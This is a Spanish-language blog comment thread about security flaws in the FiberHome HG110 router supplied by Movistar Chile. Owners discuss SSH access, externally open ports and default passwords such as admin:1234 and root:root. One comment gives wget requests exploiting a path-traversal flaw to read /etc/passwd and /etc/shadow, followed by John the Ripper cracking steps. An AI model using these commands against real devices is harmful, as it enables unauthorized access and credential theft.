muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD

↧

Por: leonciokof

October 4, 2011, 2:01 pm

≫ Next: Por: Zerial

≪ Previous: Por: r4c3

¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
Gracias.

↧

Por: Zerial

October 5, 2011, 1:28 pm

≫ Next: Por: Claudio

≪ Previous: Por: leonciokof

Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)

↧

Por: Claudio

October 9, 2011, 12:43 am

≫ Next: Por: Claudio

≪ Previous: Por: Zerial

Por defecto viene el puerto 443 (https) abierto para el exterior… uno puede desde afuera acceder a la configuración básica (donde se elige la clave wifi) sin necesidad de estar conectado a la red. Lo detecté con ShieldsUp! Mi solución fue hacer forward del puerto 443 al puerto 8765 (ese puse en mi caso) a la ip 192.168.1.1, usando la dirección (que tampoco requiere login) http://router_ip:port/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd

↧

Por: Claudio

October 9, 2011, 12:58 am

≫ Next: Por: AT-HE (atesin)

≪ Previous: Por: Claudio

Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.

↧

Por: AT-HE (atesin)

October 24, 2011, 1:31 pm

≫ Next: Por: Joao Paulo

≪ Previous: Por: Claudio

para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)

# obtienen el archivo passwd y el archivo shadow

wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/passwd&
var:menu=advanced&var:page=dns”
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”

# instalan el john the ripper, luego “juntan” los dos archivos

unshadow passwd shadow > fiberhome.pwd

# luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso

john -incremental:lanman fiberhome.pwd

↧

Por: Joao Paulo

October 30, 2011, 6:35 am

≫ Next: Por: Zerial

≪ Previous: Por: AT-HE (atesin)

Someone could decrypt the root password?

↧

Por: Zerial

October 30, 2011, 2:01 pm

≫ Next: Por: Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research

≪ Previous: Por: Joao Paulo

hi Joao Paulo:

You can use a brute-force script to crack the shadow. Is not the same password at all.

cheers

↧

Por: Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research

February 21, 2012, 10:28 pm

≫ Next: Por: Ivan

≪ Previous: Por: Zerial

[...] , en abril de 2011, difundió vulnerabilidades del tipo Local File Include y Cross Site Scripting en el router [...]

↧

Por: Ivan

April 27, 2012, 12:55 am

≫ Next: Por: jonathan

≪ Previous: Por: Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research

Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno… xd

↧

Por: jonathan

May 22, 2012, 4:56 pm

≫ Next: Por: Digital_freeak

≪ Previous: Por: Ivan

hola disculpen , alguno sabe cual es la contraseña admin del modem router?
saludos

↧

Por: Digital_freeak

February 11, 2013, 12:28 pm

≫ Next: Por: dante

≪ Previous: Por: jonathan

admin:1234

↧

Por: dante

November 5, 2013, 11:50 am

≫ Next: Por: Andrés

≪ Previous: Por: Digital_freeak

hola! Alguien sabe como cambiar el password del servicio SSH? para que no sea root root. Necesito el acceso SSH pero es bastante vulnerable. Ademas existe alguna forma de reiniciar el equipo usando SSH?. gracias.

↧

Por: Andrés

May 20, 2020, 7:47 pm

≪ Previous: Por: dante

Este router tiene alguna vulnerabilidad si lo uso solo como repetidor de wifi?

↧